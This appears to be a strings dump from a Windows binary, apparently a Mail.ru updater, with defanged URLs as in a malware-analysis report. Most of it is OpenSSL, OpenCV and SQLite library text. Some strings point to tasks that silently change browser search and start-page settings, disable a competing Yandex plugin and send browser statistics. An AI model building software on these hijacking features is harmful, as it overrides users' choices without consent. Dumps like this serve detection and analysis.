hXXp://go.mail.ru/?ffverfix=1&fr=ffverfix_sg
TaskStartGroupBlackList::ProceedGoogleChrome failed, er =
TaskStartGroupBlackList::ProceedGoogleChrome failed
hXXp://go.mail.ru/?ieverfix=1&fr=ieverfix_sg
..\CommonFiles\tasks\task_amigo_remove_pinned_tabs.cpp
..\CommonFiles\Tasks\task_change_sic_settings.cpp
..\CommonFiles\tasks\task_user_preferences.cpp
mailru::TaskUserPreferences::AnalyzeFirefox
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox
Error reading yandex plugin config: %s
Error changing yandex smartbar config: %s
Error disabling yandex smartbox plugin: %s
..\CommonFiles\yandex_elements.cpp
class Json::Value *__thiscall mailru::YandexElements::FindSettingInStateConfig(class Json::Value &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &) const
Error reading yandex config setting "%s": %s
browser.uiCustomization.state
Error enabling standard search panel: %s
guid_manager.cpp
installer.cpp
mailru::reg_keyT<0>::throw_on_error
main.cpp
Started with cmd line
c:\desktop_apps\mailruupdater\concrete_update_task.hpp
self_update_task.cpp
SendBrowsersStatistic.cpp
c:\desktop_apps\mailruupdater\SendBrowsersStatistic.h
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_amigo>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_mail>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_google>::getDSEurl
service.cpp
asio.misc
asio.misc error
C:\desktop_apps\3party\boost_1_56_0\boost/exception/detail/exception_ptr.hpp
update_info.cpp
fetch_url
Program fetch url
md5 fetch url
cmd_line
util.cpp
updater::Util::SaveChromeStateTask
SHA-256 part of OpenSSL 1.0.0g 18 Jan 2012
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
SHA1 part of OpenSSL 1.0.0g 18 Jan 2012
SHA-512 part of OpenSSL 1.0.0g 18 Jan 2012
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
RSA part of OpenSSL 1.0.0g 18 Jan 2012
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
Stack part of OpenSSL 1.0.0g 18 Jan 2012
Big Number part of OpenSSL 1.0.0g 18 Jan 2012
lhash part of OpenSSL 1.0.0g 18 Jan 2012
ASN.1 part of OpenSSL 1.0.0g 18 Jan 2012
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
RAND part of OpenSSL 1.0.0g 18 Jan 2012
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
%d.%d.%d.%d
EC part of OpenSSL 1.0.0g 18 Jan 2012
ECDSA part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\ec\ec_key.c
DSA part of OpenSSL 1.0.0g 18 Jan 2012
Diffie-Hellman part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\dh\dh_key.c
value.single
value.set
USER32.DLL
NETAPI32.DLL
ADVAPI32.DLL
keylength
keyfunc
EVP part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\pkcs12\p12_key.c
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
ECDH part of OpenSSL 1.0.0g 18 Jan 2012
priv_key
pub_key
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
<unsupported>
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:<unsupported>
X400Name:<unsupported>
othername:<unsupported>
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
CONF part of OpenSSL 1.0.0g 18 Jan 2012
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
%d.%d.%d.%d/%d.%d.%d.%d
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
keyid
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
d.other
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
pubkey
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
x%s
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
cert_info
\X
'() ,-./:=?
CONF_def part of OpenSSL 1.0.0g 18 Jan 2012
[[%s]]
[%s] %s=%s
MD5 part of OpenSSL 1.0.0g 18 Jan 2012
PROXY_CERT_INFO_EXTENSION
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
certs
%s - d:d:d%.*s %d%s
AUTHORITY_KEYID
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
.\crypto\evp\evp_pkey.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
X.509 part of OpenSSL 1.0.0g 18 Jan 2012
OPENSSL_ALLOW_PROXY_CERTS
X509_CERT_PAIR
X509_CERT_AUX
%s.dll
%lu:%s:%s:%d:%s
ddddddZ
ddddddZ
PEM part of OpenSSL 1.0.0g 18 Jan 2012
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
?456789:;<=
!"#$%&'()* ,-./0123
Verifying - %s
D:\Libs\opencv\sources\modules\core\include\opencv2/core/mat.inl.hpp
D:\Libs\opencv\sources\modules\imgproc\src\templmatch.cpp
img.dims <= 2 && templ.dims <= 2 && corr.dims <= 2
corrsize.height <= img.rows   templ.rows - 1 && corrsize.width <= img.cols   templ.cols - 1
(depth == CV_8U || depth == CV_32F) && type == _templ.type() && _img.dims() <= 2
_img.size().height <= _templ.size().height && _img.size().width <= _templ.size().width
D:\Libs\opencv\sources\modules\imgproc\src\sumpixels.cpp
D:\Libs\opencv\sources\modules\core\src\alloc.cpp
D:\Libs\opencv\sources\modules\core\src\matrix.cpp
m.dims >= 2
0 <= _rowRange.start && _rowRange.start <= _rowRange.end && _rowRange.end <= m.rows
0 <= _colRange.start && _colRange.start <= _colRange.end && _colRange.end <= m.cols
m.dims <= 2
0 <= roi.x && 0 <= roi.width && roi.x   roi.width <= m.cols && 0 <= roi.y && 0 <= roi.height && roi.y   roi.height <= m.rows
r == Range::all() || (0 <= r.start && r.start < r.end && r.end <= m.size[i])
COI is not supported by the function
0 <= i && i < (int)vv.size()
0 <= i && i < (int)v.size()
Unknown/unsupported array type
i < (int)vv.size()
(size_t)i < vv.size()
!fixedSize() || ((Mat*)obj)->size.operator()() == _sz
!fixedSize() || ((UMat*)obj)->size.operator()() == _sz
!fixedSize() || ((Mat*)obj)->size.operator()() == Size(_cols, _rows)
!fixedSize() || ((UMat*)obj)->size.operator()() == Size(_cols, _rows)
CV_MAT_TYPE(mtype) == m.type()
m.dims == d
m.size[j] == sizes[j]
d == 2 && ((sizes[0] == sz.height && sizes[1] == sz.width) || (allowTransposed && sizes[0] == sz.width && sizes[1] == sz.height))
!fixedSize() || len == vv.size()
Vectors with element size %d are not supported. Please, modify OutputArray::create()
v[j].empty()
i < (int)v.size()
checkScalar(value, type(), arr.kind(), _InputArray::CUDA_GPU_MAT)
_m.dims() <= 2
_src.dims() <= 2 && esz <= 32
src.size() == dst.size() && (src.cols == 1 || src.rows == 1)
dst.cols == dst.rows
m.dims <= 2 && m.rows == m.cols
_src.dims() <= 2
A.size == arrays[i0]->size
A.step[d-1] == A.elemSize()
%s:%d: error: (%d) %s in function %s
%s:%d: error: (%d) %s
OpenCV Error: %s (%s) in %s, file %s, line %d
Inplace operation is not supported
Input image depth is not supported by function
Unsupported format or combination of formats
Input COI is not supported
No CUDA support
No OpenGL support
Unknown %s code %d
D:\Libs\opencv\sources\modules\core\src\system.cpp
tlsKey != TLS_OUT_OF_INDEXES
cv::TLSContainerStorage::releaseKey
key_ >= 0
D:\Libs\opencv\sources\modules\core\src\convert.cpp
j < nsrcs && src[j].depth() == depth
i1 >= 0 && j < ndsts && dst[j].depth() == depth
D:\Libs\opencv\sources\modules\core\src\copy.cpp
mask.depth() == CV_8U && (mcn == 1 || mcn == cn)
size() == mask.size()
checkScalar(value, type(), _value.kind(), _InputArray::MAT )
mask.empty() || (mask.type() == CV_8U && size == mask.size)
Unknown/unsupported border type
src.depth() == dst.depth() && src.size == dst.size
(coi1 != 0 || src.channels() == 1) && (coi2 != 0 || dst.channels() == 1)
src.channels() == dst.channels()
D:\Libs\opencv\sources\modules\core\src\matop.cpp
CV_MAT_CN(_type) == e.a.channels()
Unknown operation
D:\Libs\opencv\sources\modules\core\src\arithm.cpp
The operation is neither 'array op array' (where arrays have the same size and type), nor 'array op scalar', nor 'scalar op array'
(mtype == CV_8U || mtype == CV_8S) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same number of channels), nor 'array op scalar', nor 'scalar op array'
type2 == CV_64F && (sz2.height == 1 || sz2.height == 4)
(mtype == CV_8UC1 || mtype == CV_8SC1) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same type), nor 'array op scalar', nor 'scalar op array'
D:\Libs\opencv\sources\modules\core\src\stat.cpp
mask.empty() || mask.type() == CV_8U
mask.empty() || mask.type() == CV_8UC1
dst.type() == CV_64F && dst.isContinuous() && (dst.cols == 1 || dst.rows == 1) && dcn >= cn
D:\Libs\opencv\sources\modules\core\src\mathfuncs.cpp
!)>D:\Libs\opencv\sources\modules\core\src\dxt.cpp
type == srcB.type() && srcA.size() == srcB.size()
D:\Libs\opencv\sources\modules\core\src\umatrix.cpp
D:\Libs\opencv\sources\modules\core\src\array.cpp
_dst.data == data0
NULL array pointer is passed
Unrecognized or unsupported array type
unrecognized or unsupported array type
Only continuous nD arrays are supported here
Unsupported format
rect.width >= 0 && rect.height >= 0 && rect.x < image->width && rect.y < image->height && rect.x   rect.width >= (int)(rect.width > 0) && rect.y   rect.height >= (int)(rect.height > 0)
D:\Libs\opencv\sources\modules\core\src\datastructs.cpp
D:\Libs\opencv\sources\modules\core\include\opencv2/core/private.cuda.hpp
The library is compiled without CUDA support
D:\Libs\opencv\sources\modules\core\src\opengl.cpp
The library is compiled without OpenGL support
OpenCL.dll
D:\Libs\opencv\sources\modules\core\src\matmul.cpp
type == B.type() && (type == CV_32FC1 || type == CV_64FC1 || type == CV_32FC2 || type == CV_64FC2)
a_size.width == len
a_size.height == len
C.type() == type && (((flags&GEMM_3_T) == 0 && C.rows == d_size.height && C.cols == d_size.width) || ((flags&GEMM_3_T) != 0 && C.rows == d_size.width && C.cols == d_size.height))
type == _src2.type()
src1.size == src2.size
src.channels() == 1
delta.channels() == 1 && (delta.rows == src.rows || delta.rows == 1) && (delta.cols == src.cols || delta.cols == 1)
D:\Libs\opencv\sources\modules\core\src\lapack.cpp
type == _src2.type() && (type == CV_32F || type == CV_64F)
(method != DECOMP_LU && method != DECOMP_CHOLESKY) || is_normal || src.rows == src.cols
src.rows == src.cols
w.type() == u.type() && u.type() == vt.type() && u.data && vt.data && w.data
u.cols >= nm && vt.rows >= nm && (w.size() == Size(nm, 1) || w.size() == Size(1, nm) || w.size() == Size(vt.rows, u.cols))
rhs.data == 0 || (rhs.type() == type && rhs.rows == m)
D:\Libs\opencv\sources\modules\core\src\persistence.cpp
-.Inf
An attempt to add element without a key to a map, or add element with key to sequence
The key is an empty
The key is too long
Key must start with a letter or _
Key names may only contain alphanumeric characters [a-zA-Z0-9], '-', '_' and ' '
Key should start with a letter or _
Key name may only contain alphanumeric characters [a-zA-Z0-9], '-' and '_'
elements with keys can not be written to sequence
Images with planar data layout are not supported
2if%s
ß%s
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
The repeat operator "*" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
Found a closing repetition operator } with no corresponding {.
Can't terminate a sub-expression with an alternation operator |.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
A regular expression can start with the alternation operator |.
Invalid alternation operators within (?...) block.
More than one alternation operator | was encountered inside a conditional expression.
Alternation operators are not allowed inside a DEFINE block.
A repetition operator cannot be applied to a zero-width assertion.
left-curly-bracket
right-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
boost::filesystem::directory_iterator::operator  
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
libs\log\src\code_conversion.cpp
libs\log\src\global_logger_storage.cpp
libs\log\src\attribute_name.cpp
[u-u-u u:u:u.u] [%s] %s %s
[u-u-u u:u:u.u] [%s] %s %ls
libs\log\src\thread_specific.cpp
Resource.cpp
%Y-%m-%d %H:%M:%S
en_US.UTF-8
log_ng.cpp
mailru::log_ng::ExecutionTimeLogger::~ExecutionTimeLogger
is_admin.cpp
c:\desktop_apps\sputniklib\auto_handle.hpp
process_enumerate.cpp
GetModuleFileNameEx succeed %s
Path.cpp
remote_config.cpp
string.cpp
version_info.cpp
AccountInfo.cpp
mailru::sqlite::database::database
sqlite.cpp
<>"#%{}|\^~[] ?&@=:,
hXXp://
hXXps://
process_util.cpp
unzip.cpp
filesystem_utils.cpp
mailru::firefox_js_core::load_prefs_js
firefox_js.cpp
!"#$%&'(
)* ,-./0123
encryption.cpp
testing_env.cpp
SessionsInfo.cpp
mailru::WaitForUserLogIn
Suggest URL
mailru::opera::searchini::save
opera_searchini.cpp
sync_objects.cpp
uninstall_manager.cpp
mailru::url_parser::init
url_parser.cpp
system_info\system_info_collector.cpp
crash_handler.cpp
shortcut.cpp
thread.entry_event
thread.exit_event
mailru::http::request_headers::get_header
C:\desktop_apps\SputnikLib/http_downloader.h
HTTP/1.1
^HTTP/1.1 (\d ) (. )
mailru::http::response_headers::response_headers
mailru::http::response_headers::get_file_time
http_downloader.cpp
mailru::http::downloader_impl::connection_data_file::~connection_data_file
mailru::http::downloader_impl::handle_read_headers
mailru::http::raw::downloader::fetch_file_attributes
HTTP error %2%: %3%
mailru::http::fetch_wstring_via_tempfile
system_info\system_info.cpp
s-sputnik.mail.ru
hXXps://VVV.geotrust.com/resources/root_certificates/certificates/Equifax_Secure_Certificate_Authority.pem
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
255.255.255.255
asio.ssl
asio.ssl error
add_certificate_authority
https
HTTP error:
caching_policy.cpp
task_scheduler.cpp
Line %d, Column %d
Visual C   CRT: Not enough memory to complete call to strerror.
%S#[k
?#%X.y
MaxPolicyElementKey
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
pExecutionResource
SQLite format 3
3.7.11
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
foreign_keys
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
sqlite_stat1
SQL logic error or missing database
unknown operation
large file support is disabled
RowKey
sqlite_detach
sqlite_attach
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
c:\desktop_apps\3party\ticpp\ticpp.h
ticpp.cpp
Type is unsupported
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
type="%s"
href="%s"
unsupported version
.UTF-8
.windows-
windows1250
windows1251
windows1252
windows1253
windows1254
windows1255
windows1256
windows1257
windows874
windows932
windows936
Invalid or unsupported charset:
1.2.5
<fd:%d>
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
RSA PRIVATE KEY
PUBLIC KEY
DSA PRIVATE KEY
EC PRIVATE KEY
NETSCAPE_CERT_SEQUENCE
RIPE-MD160 part of OpenSSL 1.0.0g 18 Jan 2012
SHA part of OpenSSL 1.0.0g 18 Jan 2012
MD4 part of OpenSSL 1.0.0g 18 Jan 2012
CAST part of OpenSSL 1.0.0g 18 Jan 2012
